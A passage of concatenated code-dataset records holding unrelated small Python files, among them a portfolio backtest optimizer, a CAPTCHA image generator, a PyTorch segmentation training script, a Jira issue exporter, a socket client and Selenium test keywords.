axis=1).apply(ticker)\n book['CumulativeGainLoss'] = book['DailyGainLoss'].cumsum()\n book['PosNeg'] = np.where(book['DailyGainLoss'] < -10,\n -1,\n 0)\n end_time = time()\n k += 1\n elapsed_time = float(end_time - start_time)\n print('{} out of {} dates optimized in {} seconds'.format(k, unique_dates, round(elapsed_time, 2)))\n print(date_only.loc[date_only[INDICATOR].idxmax()])\n print(date_only.loc[date_only['pct_change'].idxmax()])\n # print('{} out of {} dates optimized in {} seconds'.format(k, unique_dates, round(elapsed_time, 2)))\n\n if elapsed_time > 10:\n try:\n sleep(15)\n gc.collect()\n continue\n except AttributeError:\n print(\"time.sleep attribute error occurred, passing over sleep func.\")\n gc.collect()\n continue\n else:\n continue\n else:\n pass\n\n# end run\n\n\nfig = plotly_express.line(book, x=\"Date\", y=\"CumulativeGainLoss\")\nfig.show()\n\nbook = book.fillna(0)\nprint(\"Total Return From {} to {} = \".format(sdate, edate) + str(round(sum(book['DailyGainLoss']),2)))\nprint(\"Total Return From {} to {} = \".format(sdate, edate) + str(round(sum(book['DailyGainLoss'])/FUNDS*100,2))+\"%\")\n","sub_path":"Optimizer_Backtest.py","file_name":"Optimizer_Backtest.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407838417","text":"\n# '第 0010 题:使用 Python 生成类似于图中的字母验证码图片'\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\n\nimport random,string\n\ndef rndChar():\n stringletters = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n return random.choice(stringletters)\ndef rndColor1():\n return (random.randint(64, 255), random.randint(64, 255), random.randint(64, 255))\ndef rndColor2():\n return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))\n\nfontpath = '/home/x8/Desktop/python/show-me-the-code/0010/Futura.ttf'\n\nwidth = 60*4\nheight = 60\n\nimage = Image.new('RGB', (width, height), (255, 255, 255))\n\nfont = ImageFont.truetype(font=fontpath,size = int(height * 0.7))\n# 创建Draw对象:\ndraw = ImageDraw.Draw(image)\n# 填充每个像素:\nfor x in range(width):\n for y in range(height):\n draw.point((x, y), fill=rndColor1())\n\nfor t in range(4):\n draw.text((60 * t + 10, 0), rndChar(), font=font, fill=rndColor2())\n \nimage = image.filter(ImageFilter.BLUR)\nimage.save('code.jpg', 'jpeg')\n# 
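The selection step above is a 0/1 knapsack: maximize the summed indicator over binary buy variables, subject to the total open price staying within available funds. A self-contained PuLP sketch of the same formulation (prices and metric values are illustrative toy numbers):

```python
from pulp import LpProblem, LpVariable, LpMaximize, LpInteger, lpSum

open_price = [100.0, 250.0, 40.0, 80.0]  # illustrative share prices
metric = [1.2, 3.1, 0.4, 0.9]            # illustrative indicator values
budget = 300.0

P = range(len(open_price))
prob = LpProblem("Optimal_Portfolio", LpMaximize)
x = LpVariable.matrix("x", list(P), 0, 1, LpInteger)   # x[p] = 1 -> buy one share of p
prob += lpSum(metric[p] * x[p] for p in P)             # objective: total indicator
prob += lpSum(open_price[p] * x[p] for p in P) <= budget
prob.solve()
chosen = [p for p in P if x[p].varValue]               # indices of selected shares
```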
image.show()\n\n\n","sub_path":"0010/MAKEyz.py","file_name":"MAKEyz.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"16136365","text":"from random import randrange\n \n\ndef rzuckostka():\n    total = 0  # 'total' avoids shadowing the built-in sum()\n    i = 0\n    \n    while i < 3:\n        x = randrange(1, 7)\n        print(x, end=' ')\n        total += x\n        i += 1\n    print(f'Sum of pips: {total}')\nrzuckostka()\n \n    ","sub_path":"04-Subroutines/zad17.py","file_name":"zad17.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2231350","text":"from django.shortcuts import render\n\nfrom authapp.models import Companies\nfrom researchapp.models import Document\n\n\ndef research(request):\n    companies = Document.objects.order_by('company').distinct('company__name_company').values('company__name_company',\n                                                                                             'file__file', 'pk',\n                                                                                             'name', 'type_id',\n                                                                                             'description')\n    # documents = Document.objects.filter(author__in=[1,]).exclude(type__id=2)\n    documents = Document.objects.all().values('company__name_company', 'file__file', 'pk', 'name', 'type_id',\n                                              'description')\n\n    content = {\n        'companies': companies,\n        'documents': documents\n    }\n\n    return render(request, 'researchapp/research.html', content)\n","sub_path":"bridges/researchapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"61307581","text":"import pytest\n\nfrom haystack import Document\nfrom haystack.document_classifier.base import BaseDocumentClassifier\n\n\n@pytest.mark.slow\ndef test_document_classifier(document_classifier):\n    assert isinstance(document_classifier, BaseDocumentClassifier)\n\n    docs = [\n        Document(\n            content=\"\"\"That's good. I like it.\"\"\"*700,  # extra long text to check truncation\n            meta={\"name\": \"0\"},\n            id=\"1\",\n        ),\n        Document(\n            content=\"\"\"That's bad. I don't like it.\"\"\",\n            meta={\"name\": \"1\"},\n            id=\"2\",\n        ),\n    ]\n    results = document_classifier.predict(documents=docs)\n    expected_labels = [\"joy\", \"sadness\"]\n    for i, doc in enumerate(results):\n        assert doc.to_dict()[\"meta\"][\"classification\"][\"label\"] == expected_labels[i]\n\n\n@pytest.mark.slow\ndef test_zero_shot_document_classifier(zero_shot_document_classifier):\n    assert isinstance(zero_shot_document_classifier, BaseDocumentClassifier)\n\n    docs = [\n        Document(\n            content=\"\"\"That's good. I like it.\"\"\"*700,  # extra long text to check truncation\n            meta={\"name\": \"0\"},\n            id=\"1\",\n        ),\n        Document(\n            content=\"\"\"That's bad. 
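The dice exercise above (`zad17.py`) manages its own loop counter; a list comprehension expresses the three rolls more directly. A minimal equivalent:

```python
from random import randrange

rolls = [randrange(1, 7) for _ in range(3)]  # three six-sided dice
print(*rolls)
print(f"Sum of pips: {sum(rolls)}")
```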
I don't like it.\"\"\",\n            meta={\"name\": \"1\"},\n            id=\"2\",\n        ),\n    ]\n    results = zero_shot_document_classifier.predict(documents=docs)\n    expected_labels = [\"positive\", \"negative\"]\n    for i, doc in enumerate(results):\n        assert doc.to_dict()[\"meta\"][\"classification\"][\"label\"] == expected_labels[i]\n","sub_path":"test/test_document_classifier.py","file_name":"test_document_classifier.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"520441277","text":"class Node(object):\n\t\"\"\"Node of a doubly linked list.\"\"\"\n\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\t\tself.prev = None\n\n\nclass Stack:\n\tdef __init__(self):\n\t\tself.head = None\n\n\tdef push(self, data):\n\t\tnew_node = Node(data)\n\t\tif self.head is None:\n\t\t\tself.head = new_node\n\t\telse:\n\t\t\tself.head.prev = new_node\n\t\t\tnew_node.next = self.head\n\t\t\tnew_node.prev = None\n\t\t\tself.head = new_node\n\n\tdef display(self):\n\t\tif self.head is None:\n\t\t\tprint(\"Stack is empty\")\n\t\telse:\n\t\t\ttemp = self.head\n\t\t\twhile temp:\n\t\t\t\tprint(temp.data)\n\t\t\t\ttemp = temp.next\n\n\tdef pop(self):\n\t\ttemp = self.head\n\t\tif temp is None:\n\t\t\tprint(\"Stack underflow\")\n\t\telse:\n\t\t\t# if the stack holds a single node, just clear the head\n\t\t\tif temp.next is None:\n\t\t\t\tself.head = None\n\t\t\t\tself.display()\n\t\t\telse:\n\t\t\t\tself.head = self.head.next\n\t\t\t\tself.head.prev = None\n\t\t\t\tself.display()\n\n\tdef stack_length(self):\n\t\ttemp = self.head\n\t\tcount = 0\n\t\tif temp is None:\n\t\t\treturn 0\n\t\telse:\n\t\t\twhile temp:\n\t\t\t\tcount += 1\n\t\t\t\ttemp = temp.next\n\t\t\treturn count\n\n\n# A utility function to check whether the given character\n# is an operand\ndef is_operand(ch):\n    return ch.isalnum()\n\ndef prcedency(op):\n\toperator={'+':1,'-':1,'*':2,'/':2,'^':3}\n\treturn (operator[op] if op in operator else 0 )\n\ndef opening_paranthisis(ch):\n    p=\"(\" \n    return (1 if ch in p else 0)\n    \ndef closing_paranthisis(ch):\n    p=\")\" \n    return (1 if ch in p else 0)\n\ndef is_operator(op):\n\toperator=['+','-','*','/','^']\n\treturn (1 if op in operator else 0 )\n\ndef has_prcedency(x,y):\n\treturn (prcedency(x)>prcedency(y))\n\n\n\ndef infix_to_postfix(exp):\n\tstack1=Stack()\n\t#print(stack1.display())\n\tresult=\"\"\n\tfor i in range(0,len(exp)):\n\t\t# operands (letters or digits) go straight to the output\n\t\tif is_operand(exp[i]):\n\t\t\tresult=result+exp[i]\n\n\t\telif is_operator(exp[i]):\n\t\t\t# pop operators of higher precedence before pushing this one\n\t\t\twhile(stack1.stack_length()>0 and not opening_paranthisis(exp[i]) and has_prcedency(stack1.head.data,exp[i])):\n\t\t\t\tresult=result+stack1.head.data\n\t\t\t\tstack1.pop()\n\t\t\t\t#print(\"inside running\")\n\t\t\tstack1.push(exp[i])\n\t\t\tprint(stack1.display())\n\n\t\telif opening_paranthisis(exp[i]):\n\t\t\tstack1.push(exp[i])\n\n\t\telif closing_paranthisis(exp[i]):\n\t\t\twhile stack1.stack_length()>0 and not opening_paranthisis(stack1.head.data):\n\t\t\t\tresult=result+stack1.head.data\n\t\t\t\tstack1.pop()  # the call parentheses were missing here, so this loop never advanced\n\t\t\tstack1.pop()\n\twhile (stack1.head):\n\t\tresult=result+stack1.head.data  # head is a Node; append its payload, not the node itself\n\t\tstack1.pop()\n\n\tprint(result)\n\n\n\nif __name__ == '__main__':\n\n\tstack=Stack()\n\twhile (True):\n\t\tprint(\"################### Welcome to the stack menu #####################\")\n\t\tprint(\"1 push data \")\n\t\tprint(\"2 show data \")\n\t\tprint(\"3 pop element\")\n\t\tprint(\"4 infix to postfix conversion 
\")\n\n\t\tch=int(input(\"Enter your choice >\"))\n\t\tif ch==1:\n\t\t\twhile(True):\n\t\t\t\tdata=input(\"Enter data >\")\n\t\t\t\tif not data:\n\t\t\t\t\tbreak\n\t\t\t\tstack.push(data)\n\t\telif ch==2:\n\t\t\tstack.display()\n\t\telif ch==3:\n\t\t\tstack.pop()\n\t\telif ch==4:\n\t\t\texpression=input(\"Enter expression >\")\n\t\t\tinfix_to_postfix(expression)\n\t\telse:\n\t\t\tpass\n","sub_path":"Stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40791049","text":"\"\"\"\n\tsetup.py\n\n\tcreates the necessary database file\n\tand initialises it with random\n\tvalues\n\"\"\"\n\nimport sqlite3 as sql\nimport random\n\nadjectives = open(\"adjectives.txt\", \"r\")\nnouns = open(\"nouns.txt\", \"r\")\n\nnoun = random.choice([i.rstrip().rstrip(\"\\n\").lstrip().lstrip(\"\\n\") for i in nouns])\nadjective = random.choice([i.rstrip().rstrip(\"\\n\").lstrip().lstrip(\"\\n\") for i in adjectives])\ngithub = \"https://github.com/shardic1/li.nk\"\nt = (noun+adjective, github,)\n\nconn = sql.connect(\"links.db\")\nc = conn.cursor()\nc.execute(\"\"\"CREATE TABLE IF NOT EXISTS links\n\t\t\t(key TEXT, url TEXT)\"\"\")\nc.execute(\"\"\"INSERT INTO links (key, url)\n\t\t\tVALUES (?, ?)\"\"\", t)\nconn.commit()\nconn.close()","sub_path":"li.nk/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"192126750","text":"import torch\nimport torch.nn.functional as fun\nfrom torch.autograd import Variable\nimport sys\nimport numpy as np\nimport pdb, os, argparse\nfrom datetime import datetime\nimport copy\n\nfrom model.CPD_ResNet_models import CPD_ResNet\nfrom model.CPD_models import CPD_VGG\nfrom model.CPD_MobileNet_models import CPD_MobileNet\nfrom data import get_loader\nfrom utils import clip_gradient, adjust_lr\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1'\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epoch', type=int, default=5000, help='epoch number')\nparser.add_argument('--lr', type=float, default=1e-4, help='learning rate')\nparser.add_argument('--batchsize', type=int, default=16, help='training batch size')\nparser.add_argument('--trainsize', type=int, default=448, help='training dataset size')\nparser.add_argument('--clip', type=float, default=0.5, help='gradient clipping margin')\nparser.add_argument('--is_ResNet', type=str, default='mobile', help='VGG or ResNet backbone')\nparser.add_argument('--decay_rate', type=float, default=0.1, help='decay rate of learning rate')\nparser.add_argument('--decay_epoch', type=int, default=50, help='every n epochs decay learning rate')\nopt = parser.parse_args()\n\nback_dir = '/home/hypevr/Desktop/data/projects/background/image/'\nprint('Learning Rate: {} ResNet: {}'.format(opt.lr, opt.is_ResNet))\n# build models\nif opt.is_ResNet == 'resnet':\n model = CPD_ResNet()\nelif opt.is_ResNet == 'vgg':\n model = CPD_VGG()\nelif opt.is_ResNet == 'mobile':\n model = CPD_MobileNet()\n\ndef DICE(inputs, targets, smooth=1):\n # comment out if your model contains a sigmoid or equivalent activation layer\n inputs = fun.sigmoid(inputs)\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n intersection = (inputs * targets).sum()\n dice = (2. 
* intersection + smooth) / (inputs.sum() + targets.sum() + smooth)\n\n return 1 - dice\n\nmodel_dir = \"./models/CPD_MobileNet_v3/\"\n\n\n##############################\ncheckpoint = None\nload_pretrained = False\n#############################\n\n\nif checkpoint:\n checkpoint_dir = model_dir + 'CPD_' + str(checkpoint) + '.pth'\n model.load_state_dict(torch.load(checkpoint_dir))\n\nif load_pretrained:\n model.load_state_dict(torch.load('CPD.pth'))\n\nmodel.cuda()\nparams = model.parameters()\noptimizer = torch.optim.Adam(params, opt.lr)\n\ndata_root = '/home/hypevr/data/projects/data/combined_human/'\nimage_root = data_root+'train/image/'\ngt_root = data_root+'train/mask/'\ntrain_loader = get_loader(image_root, gt_root, batchsize=opt.batchsize, trainsize=opt.trainsize, fake_back_rate=0.1, back_dir=back_dir)\ntotal_step = len(train_loader)\n\nimage_root_v = data_root+'val/image/'\ngt_root_v = data_root+'val/mask/'\nval_loader = get_loader(image_root_v, gt_root_v, batchsize=opt.batchsize, trainsize=opt.trainsize, fake_back_rate=0, back_dir=None)\ntotal_step_v = len(val_loader)\n\n\nCE = torch.nn.BCEWithLogitsLoss()\n\n\n\ndef train(train_loader, model, optimizer, epoch):\n model.train()\n for i, pack in enumerate(train_loader, start=1):\n optimizer.zero_grad()\n images, gts = pack\n images = Variable(images)\n gts = Variable(gts)\n images = images.cuda()\n gts = gts.cuda()\n\n atts, dets = model(images) #\n loss1 = CE(atts, gts)\n loss2 = CE(dets, gts)\n loss = loss1 + loss2\n loss.backward()\n\n clip_gradient(optimizer, opt.clip)\n optimizer.step()\n\n print(str(i) + '/' + str(total_step))\n sys.stdout.write(\"\\033[F\")\n\n if i == total_step:\n print('{} Epoch [{:03d}/{:03d}], Step [{:04d}/{:04d}], Loss1: {:.4f} Dice1: {:0.4f}'.\n format(datetime.now(), epoch, opt.epoch, i, total_step, loss1.data, loss.data, ))\n\n\n save_path = 'models/' + opt.is_ResNet + '_random_0.1/'\n\n\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model.state_dict(), save_path + 'CPD_%d.pth' % epoch)\n if (epoch+1) % 3 == 0:\n model.eval()\n for i, pack in enumerate(val_loader, start=1):\n images, gts = pack\n images = Variable(images)\n gts = Variable(gts)\n images = images.cuda()\n gts = gts.cuda()\n\n atts, dets = model(images) #\n\n #dice1 = DICE(atts, gts)\n loss1 = CE(atts, gts)# + dice1\n # dice2 = DICE(dets, gts)\n loss2 = CE(dets, gts)# + dice2\n loss = loss1 + loss2\n\n print(str(i) + '/' + str(total_step_v))\n sys.stdout.write(\"\\033[F\")\n\n if i == total_step_v:\n print(\n 'validation phase: {} Epoch [{:03d}/{:03d}], Step [{:04d}/{:04d}], Loss1: {:.4f} Loss2: {:0.4f}'.\n format(datetime.now(), epoch, opt.epoch, i, total_step, loss1.data, loss.data))\n\n torch.save(model.state_dict(), save_path + 'CPD_%d.pth' % epoch)\n\nprint(\"Let's go!\")\nfor epoch in range(1, opt.epoch):\n if checkpoint:\n epoch += int(checkpoint)\n adjust_lr(optimizer, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)\n train(train_loader, model, optimizer, epoch)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24277034","text":"# rediriger stdout dans un buffer :\nsys.stdout = StringIO.StringIO()\n \n# appel de la fonction qui remplira stdout (donc le buffer)\nniveau_1()\n\n# récupérer le contenu du buffer :\ns = sys.stdout.getvalue()\n\n# On test\ntry :\n\tassert s == 'Hello World !\\n'\n\tsuccess=True\nexcept:\n\tsuccess=False \n\n \n# fermer le buffer 
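`train.py` defines a soft Dice loss (`DICE`) but never calls it, training on `BCEWithLogitsLoss` alone. For reference, a standalone version of the same loss using `torch.sigmoid` (the non-deprecated spelling of `F.sigmoid`):

```python
import torch

def dice_loss(logits: torch.Tensor, targets: torch.Tensor, smooth: float = 1.0) -> torch.Tensor:
    # Soft Dice: 1 - 2|X∩Y| / (|X| + |Y|), computed on flattened probabilities.
    probs = torch.sigmoid(logits).reshape(-1)
    targets = targets.reshape(-1)
    intersection = (probs * targets).sum()
    return 1 - (2.0 * intersection + smooth) / (probs.sum() + targets.sum() + smooth)
```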
:\nsys.stdout.close()\n \n# rediriger stdout vers la sortie standart :\nsys.stdout = sys.__stdout__\n","sub_path":"level/niveau_1/test_niveau_1.py","file_name":"test_niveau_1.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268422846","text":"import pytest\n\nfrom unittest.mock import sentinel\n\nfrom ..flows import PreflightFlow\n\n\nclass TestPreflightFlow:\n def test_init(self, mocker):\n init = mocker.patch('cumulusci.core.flows.BaseFlow.__init__')\n init.return_value = None\n preflight_flow = PreflightFlow(preflight_result=sentinel.preflight)\n assert preflight_flow.preflight_result == sentinel.preflight\n\n @pytest.mark.django_db\n def test_post_flow(\n self, mocker, user_factory, plan_factory, step_factory,\n preflight_result_factory):\n init = mocker.patch('cumulusci.core.flows.BaseFlow.__init__')\n init.return_value = None\n user = user_factory()\n plan = plan_factory()\n step1 = step_factory(plan=plan, task_name='name_1')\n step_factory(plan=plan, task_name='name_2')\n step3 = step_factory(plan=plan, task_name='name_3')\n pfr = preflight_result_factory(user=user, plan=plan)\n preflight_flow = PreflightFlow(preflight_result=pfr)\n preflight_flow.step_return_values = [\n {'msg': 'error 1', 'status_code': 'error', 'task_name': 'name_1'},\n {'msg': '', 'status_code': 'ok', 'task_name': 'name_2'},\n {'msg': 'error 2', 'status_code': 'error', 'task_name': 'name_3'},\n ]\n\n preflight_flow._post_flow()\n\n assert pfr.results == {\n step1.id: [{'status': 'error', 'message': 'error 1'}],\n step3.id: [{'status': 'error', 'message': 'error 2'}],\n }\n","sub_path":"metadeploy/api/tests/flows.py","file_name":"flows.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"800189","text":"import logging\nfrom collections import namedtuple, defaultdict\nfrom typing import Dict, List, Tuple\n\nimport jira\nfrom dateutil import parser\nfrom yarl import URL\n\nfrom plan_b.issue import parse_work_estimate_text, Issue, Team, WorkEstimate\nfrom plan_b.plan import IssuesDataSource\nfrom plan_b.team import match_team_by_worker_name\n\nlog = logging.getLogger(__name__)\n\n\nJiraIssue = namedtuple(\n 'JiraIssue',\n [\n 'key',\n 'url',\n 'type',\n 'summary',\n 'assignee',\n 'reporter',\n 'created',\n 'resolved',\n 'due',\n 'time_spent',\n 'severity',\n 'priority',\n 'components',\n 'tags',\n 'qa_advice',\n 'status',\n 'resolution',\n 'epic_link',\n 'comments',\n 'aggregated_orig_estimate',\n 'orig_estimate',\n 'raw_issue'\n ]\n)\n\n\nJiraComment = namedtuple('JiraComment', ['author', 'body'])\n\n\nWORKDAY_SECONDS = 28800 # 8 * 60 * 60\n\n\ndef make_jira_issue_from_raw_data(raw_issue, comments=tuple()) -> JiraIssue:\n jira_server = getattr(raw_issue, '_options', {'server': 'https://jira.domain'})['server']\n\n return JiraIssue(\n key=raw_issue.key,\n url=f'{jira_server}/browse/{raw_issue.key}',\n type=raw_issue.fields.issuetype.name,\n summary=raw_issue.fields.summary,\n assignee=raw_issue.fields.assignee,\n reporter=raw_issue.fields.reporter,\n created=parser.parse(raw_issue.fields.created) if raw_issue.fields.created else None,\n resolved=parser.parse(raw_issue.fields.resolutiondate) if raw_issue.fields.resolutiondate else None,\n due=parser.parse(raw_issue.fields.duedate) if raw_issue.fields.duedate else None,\n time_spent=raw_issue.fields.aggregatetimespent,\n severity=raw_issue.fields.customfield_10073.value\n if 
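The grader snippet above swaps `sys.stdout` for a `StringIO` by hand and restores it afterwards; since Python 3.4, `contextlib.redirect_stdout` does the same capture and guarantees restoration even if the tested function raises. A minimal sketch (the print stands in for the exercise's `niveau_1()`):

```python
import io
from contextlib import redirect_stdout

buf = io.StringIO()
with redirect_stdout(buf):
    print("Hello World !")        # stands in for niveau_1()
assert buf.getvalue() == "Hello World !\n"
```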
hasattr(raw_issue.fields, 'customfield_10073') and raw_issue.fields.customfield_10073 is not None\n else None,\n priority=raw_issue.fields.priority,\n components=str(raw_issue.fields.components),\n tags=str(raw_issue.fields.customfield_10180),\n qa_advice=raw_issue.fields.customfield_16390\n if hasattr(raw_issue.fields, 'customfield_16390') and raw_issue.fields.customfield_16390 is not None\n else None,\n status=raw_issue.fields.status.name,\n resolution=raw_issue.fields.resolution,\n epic_link=raw_issue.fields.customfield_13694 if raw_issue.fields.customfield_13694 else None,\n comments=comments,\n aggregated_orig_estimate=raw_issue.fields.aggregatetimeoriginalestimate,\n orig_estimate=raw_issue.fields.timeoriginalestimate,\n raw_issue=raw_issue\n )\n\n\nclass JiraIssuesDataSource(IssuesDataSource):\n\n def __init__(self, name: str, url: URL):\n super().__init__(name, url)\n self.jira_client = None\n\n @staticmethod\n def _find_and_parse_plan_comment(jira_issue: JiraIssue, team_by_name: dict) -> defaultdict:\n estimates_by_team = defaultdict(WorkEstimate)\n for comment in jira_issue.comments:\n estimate, team_name = parse_work_estimate_text(comment.body, comment.author, team_by_name)\n if estimate is None:\n continue\n if team_name is None:\n log.warning('Could not match team for %s', jira_issue.url)\n estimates_by_team[team_name] = estimate\n\n return estimates_by_team\n\n def export_issues(self, data_query: str, teams: List[Team]) -> Tuple[List[Issue], Dict[Team, int]]:\n if not self.jira_client:\n self.jira_client = jira.JIRA(\n {\n 'server': str(URL.build(scheme=self.url.scheme, host=self.url.host))\n },\n basic_auth=(self.url.user, self.url.password)\n )\n\n epics_and_stories = []\n known_bugs = []\n epics = set()\n\n log.debug('Searching issues for project with query \"%s\"', data_query)\n raw_issues = self.jira_client.search_issues(data_query, maxResults=10000)\n for raw_issue in raw_issues:\n jira_issue = make_jira_issue_from_raw_data(raw_issue)\n if jira_issue.type == 'Epic':\n epics.add(jira_issue.key)\n if jira_issue.type in ('Epic', 'Story'):\n epics_and_stories.append(jira_issue)\n if jira_issue.type in ('Bug', 'Bug US') and jira_issue.status.lower() in ['open', 'in progress']:\n known_bugs.append(jira_issue)\n\n filtered_epics_and_stories = []\n for issue in epics_and_stories:\n if issue.type == 'Story' and issue.epic_link in epics:\n continue # skip stories that are already in epics assigned to teams from plan\n log.debug('loading comments for issue %s', issue.key)\n comments = self.jira_client.comments(issue.raw_issue)\n issue = issue._replace(comments=tuple(JiraComment(x.author.name, x.body) for x in comments))\n filtered_epics_and_stories.append(issue)\n\n epics_and_stories = []\n teams_by_name = {x.name: x for x in teams}\n for issue in filtered_epics_and_stories:\n log.debug('Scanning for #plan comment in issue %s', issue.key)\n estimates = self._find_and_parse_plan_comment(issue, teams_by_name)\n\n owner_team = match_team_by_worker_name(issue.assignee.name, teams)\n if owner_team is None:\n log.warning('Owner team is not a team from plan for %s', issue.url)\n epics_and_stories.append(\n Issue(\n issue.key,\n issue.summary,\n issue.url,\n issue.status,\n work_estimates=estimates,\n owned_by_team=owner_team\n )\n )\n\n known_bugs_count = {x: 0 for x in teams if x.is_dev()}\n for bug in known_bugs:\n if not bug.assignee:\n log.warning(f'Empty or invalid assignee for bug %s', bug.url)\n continue\n\n bug_owner_team = match_team_by_worker_name(bug.assignee.name, teams)\n if 
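`JiraIssue` is a `namedtuple`, so instances are immutable; that is why the exporter attaches comments with `issue._replace(...)`, which builds a new tuple instead of mutating the old one. A minimal illustration:

```python
from collections import namedtuple

Issue = namedtuple("Issue", ["key", "comments"])
base = Issue(key="PROJ-1", comments=())
updated = base._replace(comments=("looks good",))  # returns a new tuple
assert base.comments == () and updated.comments == ("looks good",)
```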
bug_owner_team:\n                if bug_owner_team.is_dev():\n                    known_bugs_count[bug_owner_team] += 1\n                else:\n                    log.warning('Invalid owner team for bug %s', bug.url)\n\n        return epics_and_stories, known_bugs_count\n","sub_path":"plan_b/issue_data_sources/jira.py","file_name":"jira.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434135770","text":"def giaithua(n):  # 'giai thua' is Vietnamese for factorial\n    thua = 1\n    if n == 0 or n == 1:\n        return thua\n    else:\n        for i in range(2, n + 1):\n            thua *= i\n        return thua\nn = int(input(\"Enter n: \"))\nprint(giaithua(n))\n\n","sub_path":"Buoi3/lesson3.2.py","file_name":"lesson3.2.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24129369","text":"import socket\n# create a socket object\nsk = socket.socket()\n# connect to the given host and port\nsk.connect(('127.0.0.1', 12300))\n# send a message\nsk.sendall(input('>>>').encode('utf8'))\n# receive the reply\nserver_info = sk.recv(1024).decode('utf8')\nprint(f'info from server: {server_info}')\nsk.close()\n\n","sub_path":"Python_Advanced/socket编程/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56557071","text":"# There are several kinds of exceptions:\n# i = j (NameError: the name is not defined);\n\n# syntax errors in the source (SyntaxError);\n\n# a ='123'\n# print(a[3])\n# this would raise an index-out-of-range error (IndexError);\n\n# b = {'a':1, 'b':2}\n# print(b['c'])\n# this would raise a key error (KeyError);\n\n# warn the user when the input is not a number\ntry:\n    year = int(input('input year:'))\nexcept ValueError as e:\n    print('Please enter the year as a number: %s' % e)\n\n# file handling\nfile_write = None  # guard so the finally block cannot hit a NameError if open() fails\ntry:\n    file_write = open('name.txt', 'w')\nexcept Exception as e:\n    print(e)\nfinally:\n    if file_write:\n        file_write.close()\n","sub_path":"basics/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"401113772","text":"from selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom Selenium2Library import utils\r\nfrom Selenium2Library.locators import ElementFinder\r\nfrom robot.libraries.BuiltIn import BuiltIn\r\nfrom Selenium2Library.keywords.keywordgroup import KeywordGroup\r\nimport time\r\nfrom datetime import datetime\r\n\r\nclass Custom(KeywordGroup):\r\n\r\n\tdef sort_num_session_order(self, visiblerow):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tbuiltInObj = 
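The TCP client above connects to `127.0.0.1:12300`, sends one message, and waits for a reply. A minimal single-connection echo server it could talk to — a sketch for local testing, not part of the original project:

```python
import socket

srv = socket.socket()
srv.bind(("127.0.0.1", 12300))
srv.listen(1)
conn, addr = srv.accept()   # serve one client, then exit
data = conn.recv(1024)
conn.sendall(data)          # echo the message back
conn.close()
srv.close()
```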
BuiltIn()\r\n\t\tself.mouse_over(\"id=ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_bar_knob_handle\");\r\n\t\t#time.sleep(5)\r\n\t\tlist1 = []\r\n\t\tlist2 = []\r\n\t\tfor num in range(0,int(visiblerow)):\r\n\t\t\tpath = \"xpath=.//*[@id='ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_cell_R\" + str(num) + \"C2']/div/span\";\r\n\t\t\tvalue = self.get_text(path);\r\n\t\t\tlist1.append(value)\r\n\t\t\tbuiltInObj.log_to_console(value)\r\n\t\tbuiltInObj.log_to_console(list1)\r\n\t\tlist2.extend(list1)\r\n\t\t#list2.sort() #THIS WILL NOT BE EQUAL\r\n\t\tlist2.sort(key=int)  # numeric sort; a plain sort() compares the strings lexicographically\r\n\t\tbuiltInObj.log_to_console(list2)\r\n\t\tif list1 == list2:\r\n\t\t\tbuiltInObj.log_to_console(\"EQUAL\")\r\n\t\telse:\r\n\t\t\tbuiltInObj.log_to_console(\"NOT EQUAL\")\r\n\r\n\tdef last_session_order(self, visiblerow):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tbuiltInObj = BuiltIn()\r\n\t\tself.mouse_over(\"id=ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_bar_knob_handle\");\r\n\t\t#time.sleep(5)\r\n\t\tlist1 = 